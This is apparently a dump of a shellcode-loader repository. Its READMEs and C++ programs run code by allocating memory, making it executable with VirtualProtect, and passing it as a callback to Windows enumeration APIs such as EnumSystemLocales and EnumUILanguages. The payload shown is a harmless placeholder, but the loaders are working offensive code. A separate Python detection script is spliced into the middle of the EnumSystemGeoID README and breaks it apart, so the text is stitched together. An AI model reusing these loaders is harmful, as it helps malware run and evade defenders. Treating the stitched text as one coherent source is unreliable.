/windows/execution/callback/EnumResourceNamesEx/c++/resource-self/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/execution/callback/EnumResourceNamesEx/c++/resource-self/shellcode.bin
--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceTypes/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Shellcode execution using `EnumResourceTypes`.

Enumerate the resource types within a module and run a callback to process each resource type identified.

```c++
BOOL EnumResourceTypesA (HMODULE hModule, ENUMRESTYPEPROCA lpEnumFunc, LONG_PTR lParam);

BOOL EnumResourceTypesW (HMODULE hModule, ENUMRESTYPEPROCW lpEnumFunc, LONG_PTR lParam);
```

### Reference

- [MSDN EnumResourceTypesA](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-enumresourcetypesa)
- [MSDN EnumResourceTypesW](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-enumresourcetypesw)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceTypes/c++/resource-self/resources.h:
--------------------------------------------------------------------------------
#define SHELLCODE 100
--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceTypes/c++/resource-self/resources.rc:
--------------------------------------------------------------------------------
#include "resources.h"

SHELLCODE RCDATA shellcode.bin
--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceTypes/c++/resource-self/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/execution/callback/EnumResourceTypes/c++/resource-self/shellcode.bin
--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceTypesEx/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Shellcode execution using `EnumResourceTypesEx`.

Enumerate the resource types within a module and run a callback to process each resource type identified.

```c++
BOOL EnumResourceTypesExA (HMODULE hModule, ENUMRESTYPEPROCA lpEnumFunc, LONG_PTR lParam, DWORD dwFlags, LANGID LangId);

BOOL EnumResourceTypesExW (HMODULE hModule, ENUMRESTYPEPROCW lpEnumFunc, LONG_PTR lParam, DWORD dwFlags, LANGID LangId);
```

### Reference

- [MSDN EnumResourceTypesExA](https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-enumresourcetypesexa)
- [MSDN EnumResourceTypesExW](https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-enumresourcetypesexw)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceTypesEx/c++/resource-self/resources.h:
--------------------------------------------------------------------------------
#define SHELLCODE 100
--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceTypesEx/c++/resource-self/resources.rc:
--------------------------------------------------------------------------------
#include "resources.h"

SHELLCODE RCDATA shellcode.bin
--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceTypesEx/c++/resource-self/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/execution/callback/EnumResourceTypesEx/c++/resource-self/shellcode.bin
--------------------------------------------------------------------------------
/windows/execution/callback/EnumSystemCodePages/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Shellcode execution using `EnumSystemCodePages`.

```c++
BOOL EnumSystemCodePagesA (CODEPAGE_ENUMPROCA lpCodePageEnumProc, DWORD dwFlags);

BOOL EnumSystemCodePagesW (CODEPAGE_ENUMPROCW lpCodePageEnumProc, DWORD dwFlags);
```

### Reference

- [MSDN EnumSystemCodePagesA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumsystemcodepagesa)
- [MSDN EnumSystemCodePagesW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumsystemcodepagesw)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumSystemCodePages/c++/code.cpp:
--------------------------------------------------------------------------------
/*
    Shellcode Loader
    Archive of Reversing.ID

    Abusing windows API to run shellcode as callback.

    Compile:
        $ cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tccode.cpp

    Technique:
        - allocation:   VirtualAlloc
        - writing:      RtlMoveMemory
        - permission:   VirtualProtect
        - execution:    EnumSystemCodePages
*/

#include <windows.h>
#include <stdint.h>

int main ()
{
    void  * runtime;
    BOOL    retval;
    DWORD   old_protect = 0;

    // shellcode storage in stack
    uint8_t  payload [] = { 0x90, 0x90, 0xCC, 0xC3 };
    uint32_t payload_len = 4;

    // allocate memory buffer for payload as READ-WRITE (no executable)
    runtime = VirtualAlloc (0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    // copy payload to the buffer
    RtlMoveMemory (runtime, payload, payload_len);

    // make buffer executable (R-X)
    retval = VirtualProtect (runtime, payload_len, PAGE_EXECUTE_READ, &old_protect);
    if (retval != 0)
    {
        EnumSystemCodePages ((CODEPAGE_ENUMPROCA)runtime, 0);
    }

    // deallocate the space (dwSize must be 0 with MEM_RELEASE)
    VirtualFree (runtime, 0, MEM_RELEASE);

    return 0;
}
--------------------------------------------------------------------------------
/windows/execution/callback/EnumSystemGeoID/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Shellcode execution using `EnumSystemGeoID`.
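Every `code.cpp` in this collection follows the same sequence: `VirtualAlloc` with `PAGE_READWRITE`, a copy into the buffer, `VirtualProtect` to `PAGE_EXECUTE_READ`, and then an enumeration API that is handed the buffer address as its callback (see `EnumSystemCodePages/c++/code.cpp` above). From the detection side that sequence is the signal, not the particular `Enum*` function. The script below is an added example, not code from the ReversingID repository: it scans an API-call trace and reports any callback-taking call whose function pointer lands inside a private region that is executable, distinguishing a region flipped RW to RX from one allocated executable outright. The trace line shape (`pid=N Api(arg=0x..., ...) -> ret`), the parameter-name heuristic and the sample lines are all constructed for this example and are not any real tool's output; `LINE_RE` and `parse_args()` are the parts to adapt to the schema of the hook or ETW provider actually in use.

```python
"""Detection sketch for the RW -> RX -> callback loader pattern.

Added example, not part of the ReversingID repository. The trace format and
the sample lines are constructed; adapt LINE_RE / parse_args() to real input.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
PAGE_EXECUTE_MASK = 0x10 | 0x20 | 0x40 | 0x80

# Heuristic on Win32 parameter names for function pointers (lpfnEnum, lpEnumFunc,
# lpCodePageEnumProc, pCallBackRoutine, cb ...). "proc$" rather than "proc" so
# that hProcess is not matched.
CALLBACK_PARAM_RE = re.compile(r"(proc(ex)?$|func$|callback|lpfn|^cb$)", re.IGNORECASE)

# Constructed line shape: pid=<n> <Api>(<name>=<hex>, ...) [-> <ret>]
LINE_RE = re.compile(r"^pid=(\d+)\s+(\w+)\((.*?)\)(?:\s*->\s*(\S+))?\s*$")

# Constructed sample trace. pid 4120 mirrors the loaders in this repository;
# pid 5566 passes a callback inside its image; pid 7001 allocates RWX outright.
SAMPLE_TRACE = """\
pid=4120 VirtualAlloc(lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x4) -> 0x1f0000
pid=4120 RtlMoveMemory(Destination=0x1f0000, Source=0x7ffdd0, Length=0x4)
pid=4120 VirtualProtect(lpAddress=0x1f0000, dwSize=0x4, flNewProtect=0x20) -> 1
pid=4120 EnumSystemCodePages(lpCodePageEnumProc=0x1f0000, dwFlags=0x0) -> 1
pid=4120 VirtualFree(lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) -> 1
pid=5566 VirtualAlloc(lpAddress=0x0, dwSize=0x2000, flAllocationType=0x3000, flProtect=0x4) -> 0x2a0000
pid=5566 EnumWindows(lpEnumFunc=0x7ff6c0101230, lParam=0x0) -> 1
pid=7001 VirtualAlloc(lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) -> 0x330000
pid=7001 EnumWindows(lpEnumFunc=0x330010, lParam=0x0) -> 1
"""


@dataclass
class Region:
    base: int
    size: int
    protections: List[int] = field(default_factory=list)  # history, oldest first

    def contains(self, addr: int) -> bool:
        return self.base <= addr < self.base + self.size

    def executable(self) -> bool:
        return bool(self.protections) and bool(self.protections[-1] & PAGE_EXECUTE_MASK)

    def reason(self) -> str:
        # executable since allocation vs. made executable after the fact
        return "alloc-exec" if self.protections[0] & PAGE_EXECUTE_MASK else "rw-to-rx"


@dataclass(frozen=True)
class Finding:
    pid: int
    api: str
    param: str
    address: int
    reason: str


def parse_args(raw: str) -> Dict[str, int]:
    """Turn 'a=0x1, b=0x2' into {'a': 1, 'b': 2}; non-numeric values are dropped."""
    args: Dict[str, int] = {}
    for part in raw.split(","):
        name, sep, value = part.partition("=")
        if not sep:
            continue
        try:
            args[name.strip()] = int(value.strip(), 0)
        except ValueError:
            continue
    return args


def scan(trace: str) -> List[Finding]:
    """Report callback-taking calls whose pointer lies in an executable private region."""
    regions: Dict[int, List[Region]] = {}
    findings: List[Finding] = []
    for line in trace.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not an API-call line
        pid, api, raw_args, ret = int(m.group(1)), m.group(2), m.group(3), m.group(4)
        args = parse_args(raw_args)
        tracked = regions.setdefault(pid, [])
        if api == "VirtualAlloc":
            try:
                base = int(ret, 0) if ret else 0
            except ValueError:
                base = 0
            if base:  # a failed allocation returns NULL and creates no region
                tracked.append(Region(base, args.get("dwSize", 0), [args.get("flProtect", 0)]))
        elif api == "VirtualProtect":
            for region in tracked:
                if region.contains(args.get("lpAddress", -1)):
                    region.protections.append(args.get("flNewProtect", 0))
        else:
            for name, value in args.items():
                if not CALLBACK_PARAM_RE.search(name):
                    continue
                for region in tracked:
                    if region.contains(value) and region.executable():
                        findings.append(Finding(pid, api, name, value, region.reason()))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_TRACE):
        print(f"pid {f.pid}: {f.api}({f.param}=0x{f.address:x}) -> {f.reason}")
```

On the sample trace only pid 4120 (`rw-to-rx`) and pid 7001 (`alloc-exec`) are reported; pid 5566 is silent because its callback lives in the image, which is the legitimate case. Keying on the pointer's target region rather than on an API name list is what makes the check survive a swap from `EnumSystemCodePages` to any of the other enumeration functions catalogued here; with a real hook, the typed signature replaces the parameter-name heuristic.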

```c++
BOOL EnumSystemGeoID (GEOCLASS GeoClass, GEOID ParentGeoId, GEO_ENUMPROC lpGeoEnumProc);
```

### Reference

- [MSDN EnumSystemGeoID](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumsystemgeoid)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumSystemGeoID/c++/code.cpp:
--------------------------------------------------------------------------------
/*
    Shellcode Loader
    Archive of Reversing.ID

    Abusing windows API to run shellcode as callback.

    Compile:
        $ cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tccode.cpp

    Technique:
        - allocation:   VirtualAlloc
        - writing:      RtlMoveMemory
        - permission:   VirtualProtect
        - execution:    EnumSystemGeoID
*/

#include <windows.h>
#include <stdint.h>

int main ()
{
    void  * runtime;
    BOOL    retval;
    DWORD   old_protect = 0;

    // shellcode storage in stack
    uint8_t  payload [] = { 0x90, 0x90, 0xCC, 0xC3 };
    uint32_t payload_len = 4;

    // allocate memory buffer for payload as READ-WRITE (no executable)
    runtime = VirtualAlloc (0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    // copy payload to the buffer
    RtlMoveMemory (runtime, payload, payload_len);

    // make buffer executable (R-X)
    retval = VirtualProtect (runtime, payload_len, PAGE_EXECUTE_READ, &old_protect);
    if (retval != 0)
    {
        EnumSystemGeoID (GEOCLASS_NATION, 0, (GEO_ENUMPROC) runtime);
    }

    // deallocate the space (dwSize must be 0 with MEM_RELEASE)
    VirtualFree (runtime, 0, MEM_RELEASE);

    return 0;
}
--------------------------------------------------------------------------------
/windows/execution/callback/EnumSystemLanguageGroups/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Shellcode execution using `EnumSystemLanguageGroups`.

```c++
BOOL EnumSystemLanguageGroupsA (LANGUAGEGROUP_ENUMPROCA lpLanguageGroupEnumProc, DWORD dwFlags, LONG_PTR lParam);

BOOL EnumSystemLanguageGroupsW (LANGUAGEGROUP_ENUMPROCW lpLanguageGroupEnumProc, DWORD dwFlags, LONG_PTR lParam);
```

### Reference

- [MSDN EnumSystemLanguageGroupsA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumsystemlanguagegroupsa)
- [MSDN EnumSystemLanguageGroupsW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumsystemlanguagegroupsw)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumSystemLocales/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Shellcode execution using `EnumSystemLocales`.

```c++
BOOL EnumSystemLocalesA (LOCALE_ENUMPROCA lpLocaleEnumProc, DWORD dwFlags);

BOOL EnumSystemLocalesW (LOCALE_ENUMPROCW lpLocaleEnumProc, DWORD dwFlags);
```

### Reference

- [MSDN EnumSystemLocalesA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumsystemlocalesa)
- [MSDN EnumSystemLocalesW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumsystemlocalesw)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumSystemLocales/c++/code.cpp:
--------------------------------------------------------------------------------
/*
    Shellcode Loader
    Archive of Reversing.ID

    Abusing windows API to run shellcode as callback.

    Compile:
        $ cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tccode.cpp

    Technique:
        - allocation:   VirtualAlloc
        - writing:      RtlMoveMemory
        - permission:   VirtualProtect
        - execution:    EnumSystemLocales
*/

#include <windows.h>
#include <stdint.h>

int main ()
{
    void  * runtime;
    BOOL    retval;
    DWORD   old_protect = 0;

    // shellcode storage in stack
    uint8_t  payload [] = { 0x90, 0x90, 0xCC, 0xC3 };
    uint32_t payload_len = 4;

    // allocate memory buffer for payload as READ-WRITE (no executable)
    runtime = VirtualAlloc (0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    // copy payload to the buffer
    RtlMoveMemory (runtime, payload, payload_len);

    // make buffer executable (R-X)
    retval = VirtualProtect (runtime, payload_len, PAGE_EXECUTE_READ, &old_protect);
    if (retval != 0)
    {
        EnumSystemLocales ((LOCALE_ENUMPROCA)runtime, 0);
    }

    // deallocate the space (dwSize must be 0 with MEM_RELEASE)
    VirtualFree (runtime, 0, MEM_RELEASE);

    return 0;
}
--------------------------------------------------------------------------------
/windows/execution/callback/EnumSystemLocalesEx/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Shellcode execution using `EnumSystemLocalesEx`.

```c++
BOOL EnumSystemLocalesEx (LOCALE_ENUMPROCEX lpLocaleEnumProcEx, DWORD dwFlags, LPARAM lParam, LPVOID lpReserved);
```

### Reference

- [MSDN EnumSystemLocalesEx](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumsystemlocalesex)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumSystemLocalesEx/c++/code.cpp:
--------------------------------------------------------------------------------
/*
    Shellcode Loader
    Archive of Reversing.ID

    Abusing windows API to run shellcode as callback.

    Compile:
        $ cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tccode.cpp

    Technique:
        - allocation:   VirtualAlloc
        - writing:      RtlMoveMemory
        - permission:   VirtualProtect
        - execution:    EnumSystemLocalesEx
*/

#include <windows.h>
#include <stdint.h>

int main ()
{
    void  * runtime;
    BOOL    retval;
    DWORD   old_protect = 0;

    // shellcode storage in stack
    uint8_t  payload [] = { 0x90, 0x90, 0xCC, 0xC3 };
    uint32_t payload_len = 4;

    // allocate memory buffer for payload as READ-WRITE (no executable)
    runtime = VirtualAlloc (0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    // copy payload to the buffer
    RtlMoveMemory (runtime, payload, payload_len);

    // make buffer executable (R-X)
    retval = VirtualProtect (runtime, payload_len, PAGE_EXECUTE_READ, &old_protect);
    if (retval != 0)
    {
        EnumSystemLocalesEx ((LOCALE_ENUMPROCEX)runtime, 0, 0, NULL);
    }

    // deallocate the space (dwSize must be 0 with MEM_RELEASE)
    VirtualFree (runtime, 0, MEM_RELEASE);

    return 0;
}
--------------------------------------------------------------------------------
/windows/execution/callback/EnumThreadWindows/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Shellcode execution using `EnumThreadWindows`.

```c++
BOOL EnumThreadWindows (DWORD dwThreadId, WNDENUMPROC lpfn, LPARAM lParam);
```

### Reference

- [MSDN EnumThreadWindows](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumthreadwindows)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumTimeFormats/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Shellcode execution using `EnumTimeFormats`.

```c++
BOOL EnumTimeFormatsA (TIMEFMT_ENUMPROCA lpTimeFmtEnumProc, LCID Locale, DWORD dwFlags);

BOOL EnumTimeFormatsW (TIMEFMT_ENUMPROCW lpTimeFmtEnumProc, LCID Locale, DWORD dwFlags);
```

### Reference

- [MSDN EnumTimeFormatsA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumtimeformatsa)
- [MSDN EnumTimeFormatsW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumtimeformatsw)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumTimeFormats/c++/code.cpp:
--------------------------------------------------------------------------------
/*
    Shellcode Loader
    Archive of Reversing.ID

    Abusing windows API to run shellcode as callback.

    Compile:
        $ cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tccode.cpp

    Technique:
        - allocation:   VirtualAlloc
        - writing:      RtlMoveMemory
        - permission:   VirtualProtect
        - execution:    EnumTimeFormats
*/

#include <windows.h>
#include <stdint.h>

int main ()
{
    void  * runtime;
    BOOL    retval;
    DWORD   old_protect = 0;

    // shellcode storage in stack
    uint8_t  payload [] = { 0x90, 0x90, 0xCC, 0xC3 };
    uint32_t payload_len = 4;

    // allocate memory buffer for payload as READ-WRITE (no executable)
    runtime = VirtualAlloc (0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    // copy payload to the buffer
    RtlMoveMemory (runtime, payload, payload_len);

    // make buffer executable (R-X)
    retval = VirtualProtect (runtime, payload_len, PAGE_EXECUTE_READ, &old_protect);
    if (retval != 0)
    {
        EnumTimeFormats ((TIMEFMT_ENUMPROCA)runtime, LOCALE_SYSTEM_DEFAULT, 0);
    }

    // deallocate the space (dwSize must be 0 with MEM_RELEASE)
    VirtualFree (runtime, 0, MEM_RELEASE);

    return 0;
}
--------------------------------------------------------------------------------
/windows/execution/callback/EnumTimeFormatsEx/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Shellcode execution using `EnumTimeFormatsEx`.

```c++
BOOL EnumTimeFormatsEx (TIMEFMT_ENUMPROCEX lpTimeFmtEnumProcEx, LPCWSTR lpLocaleName, DWORD dwFlags, LPARAM lParam);
```

### Reference

- [MSDN EnumTimeFormatsEx](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumtimeformatsex)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumTimeFormatsEx/c++/code.cpp:
--------------------------------------------------------------------------------
/*
    Shellcode Loader
    Archive of Reversing.ID

    Abusing windows API to run shellcode as callback.

    Compile:
        $ cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tccode.cpp

    Technique:
        - allocation:   VirtualAlloc
        - writing:      RtlMoveMemory
        - permission:   VirtualProtect
        - execution:    EnumTimeFormatsEx
*/

#include <windows.h>
#include <stdint.h>

int main ()
{
    void  * runtime;
    BOOL    retval;
    DWORD   old_protect = 0;

    // shellcode storage in stack
    uint8_t  payload [] = { 0x90, 0x90, 0xCC, 0xC3 };
    uint32_t payload_len = 4;

    // allocate memory buffer for payload as READ-WRITE (no executable)
    runtime = VirtualAlloc (0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    // copy payload to the buffer
    RtlMoveMemory (runtime, payload, payload_len);

    // make buffer executable (R-X)
    retval = VirtualProtect (runtime, payload_len, PAGE_EXECUTE_READ, &old_protect);
    if (retval != 0)
    {
        EnumTimeFormatsEx ((TIMEFMT_ENUMPROCEX)runtime, NULL, 0, 0);
    }

    // deallocate the space (dwSize must be 0 with MEM_RELEASE)
    VirtualFree (runtime, 0, MEM_RELEASE);

    return 0;
}
--------------------------------------------------------------------------------
/windows/execution/callback/EnumUILanguages/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Shellcode execution using `EnumUILanguages`.

```c++
BOOL EnumUILanguagesA (UILANGUAGE_ENUMPROCA lpUILanguageEnumProc, DWORD dwFlags, LONG_PTR lParam);

BOOL EnumUILanguagesW (UILANGUAGE_ENUMPROCW lpUILanguageEnumProc, DWORD dwFlags, LONG_PTR lParam);
```

### Reference

- [MSDN EnumUILanguagesA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumuilanguagesa)
- [MSDN EnumUILanguagesW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumuilanguagesw)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumUILanguages/c++/code.cpp:
--------------------------------------------------------------------------------
/*
    Shellcode Loader
    Archive of Reversing.ID

    Abusing windows API to run shellcode as callback.

    Compile:
        $ cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tccode.cpp

    Technique:
        - allocation:   VirtualAlloc
        - writing:      RtlMoveMemory
        - permission:   VirtualProtect
        - execution:    EnumUILanguages
*/

#include <windows.h>
#include <stdint.h>

int main ()
{
    void  * runtime;
    BOOL    retval;
    DWORD   old_protect = 0;

    // shellcode storage in stack
    uint8_t  payload [] = { 0x90, 0x90, 0xCC, 0xC3 };
    uint32_t payload_len = 4;

    // allocate memory buffer for payload as READ-WRITE (no executable)
    runtime = VirtualAlloc (0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    // copy payload to the buffer
    RtlMoveMemory (runtime, payload, payload_len);

    // make buffer executable (R-X)
    retval = VirtualProtect (runtime, payload_len, PAGE_EXECUTE_READ, &old_protect);
    if (retval != 0)
    {
        EnumUILanguages ((UILANGUAGE_ENUMPROCA)runtime, MUI_LANGUAGE_ID, 0);
    }

    // deallocate the space (dwSize must be 0 with MEM_RELEASE)
    VirtualFree (runtime, 0, MEM_RELEASE);

    return 0;
}
--------------------------------------------------------------------------------
/windows/execution/callback/EnumWindowStations/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Shellcode execution using `EnumWindowStations`.

```c++
BOOL EnumWindowStationsA (WINSTAENUMPROCA lpEnumFunc, LPARAM lParam);

BOOL EnumWindowStationsW (WINSTAENUMPROCW lpEnumFunc, LPARAM lParam);
```

### Reference

- [MSDN EnumWindowStationsA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumwindowstationsa)
- [MSDN EnumWindowStationsW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumwindowstationsw)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumWindows/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Shellcode execution using `EnumWindows`.

```c++
BOOL EnumWindows (WNDENUMPROC lpEnumFunc, LPARAM lParam);
```

### Reference

- [MSDN EnumWindows](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumwindows)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumerateLoadedModules/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Shellcode execution using `EnumerateLoadedModules`.

```c++
BOOL EnumerateLoadedModules (HANDLE hProcess, PENUMLOADED_MODULES_CALLBACK EnumLoadedModulesCallback, PVOID UserContext);
```

### Reference

- [MSDN EnumerateLoadedModules](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-enumerateloadedmodules)

--------------------------------------------------------------------------------
/windows/execution/callback/EnumerateLoadedModulesEx/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode via `EnumerateLoadedModulesEx`.

```c++
BOOL EnumerateLoadedModulesEx (HANDLE hProcess, PENUMLOADED_MODULES_CALLBACK64 EnumLoadedModulesCallback, PVOID UserContext);

BOOL EnumerateLoadedModulesExW (HANDLE hProcess, PENUMLOADED_MODULES_CALLBACKW64 EnumLoadedModulesCallback, PVOID UserContext);

BOOL EnumerateLoadedModules64 (HANDLE hProcess, PENUMLOADED_MODULES_CALLBACK64 EnumLoadedModulesCallback, PVOID UserContext);

BOOL EnumerateLoadedModulesW64 (HANDLE hProcess, PENUMLOADED_MODULES_CALLBACKW64 EnumLoadedModulesCallback, PVOID UserContext);
```

### Reference

- [MSDN EnumerateLoadedModulesEx](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-enumerateloadedmodulesex)
- [MSDN EnumerateLoadedModulesExW](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-enumerateloadedmodulesexw)
- [MSDN EnumerateLoadedModules64](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-enumerateloadedmodules64)
- [MSDN EnumerateLoadedModulesW64](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-enumerateloadedmodulesw64)

--------------------------------------------------------------------------------
/windows/execution/callback/FindDebugInfoFileEx/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode via `FindDebugInfoFileEx`.

```c++
HANDLE FindDebugInfoFileEx (PCSTR FileName, PCSTR SymbolPath, PSTR DebugFilePath, PFIND_DEBUG_FILE_CALLBACK Callback, PVOID CallerData);
```

### Reference

- [MSDN FindDebugInfoFileEx](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-finddebuginfofileex)

--------------------------------------------------------------------------------
/windows/execution/callback/FindExecutableImageEx/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode via `FindExecutableImageEx`.

```c++
HANDLE FindExecutableImageEx (PCSTR FileName, PCSTR SymbolPath, PSTR ImageFilePath, PFIND_EXE_FILE_CALLBACK Callback, PVOID CallerData);
```

### Reference

- [MSDN FindExecutableImageEx](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-findexecutableimageex)

--------------------------------------------------------------------------------
/windows/execution/callback/GetOpenFileName/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode via `GetOpenFileName`. The callback pointer goes into the `lpfnHook` member of the `OPENFILENAME` structure and is honoured only when `Flags` includes `OFN_ENABLEHOOK`.

```c++
BOOL GetOpenFileNameA (LPOPENFILENAMEA param);

BOOL GetOpenFileNameW (LPOPENFILENAMEW param);
```

### Reference

- [MSDN GetOpenFileNameA](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/nf-commdlg-getopenfilenamea)
- [MSDN GetOpenFileNameW](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/nf-commdlg-getopenfilenamew)
- [MSDN structure OPENFILENAMEA](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-openfilenamea)
- [MSDN structure OPENFILENAMEW](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-openfilenamew)

--------------------------------------------------------------------------------
/windows/execution/callback/GetSaveFileName/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode via `GetSaveFileName`. As with `GetOpenFileName`, the callback is the `lpfnHook` member of `OPENFILENAME` and requires `OFN_ENABLEHOOK` in `Flags`.

```c++
BOOL GetSaveFileNameA (LPOPENFILENAMEA param);

BOOL GetSaveFileNameW (LPOPENFILENAMEW param);
```

### Reference

- [MSDN GetSaveFileNameA](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/nf-commdlg-getsavefilenamea)
- [MSDN GetSaveFileNameW](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/nf-commdlg-getsavefilenamew)
- [MSDN structure OPENFILENAMEA](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-openfilenamea)
- [MSDN structure OPENFILENAMEW](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-openfilenamew)

--------------------------------------------------------------------------------
/windows/execution/callback/GrayString/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode via `GrayString`.

```c++
BOOL GrayStringA (HDC hDC, HBRUSH hBrush, GRAYSTRINGPROC lpOutputFunc, LPARAM lpData, int nCount, int X, int Y, int nWidth, int nHeight);

BOOL GrayStringW (HDC hDC, HBRUSH hBrush, GRAYSTRINGPROC lpOutputFunc, LPARAM lpData, int nCount, int X, int Y, int nWidth, int nHeight);
```

### Reference

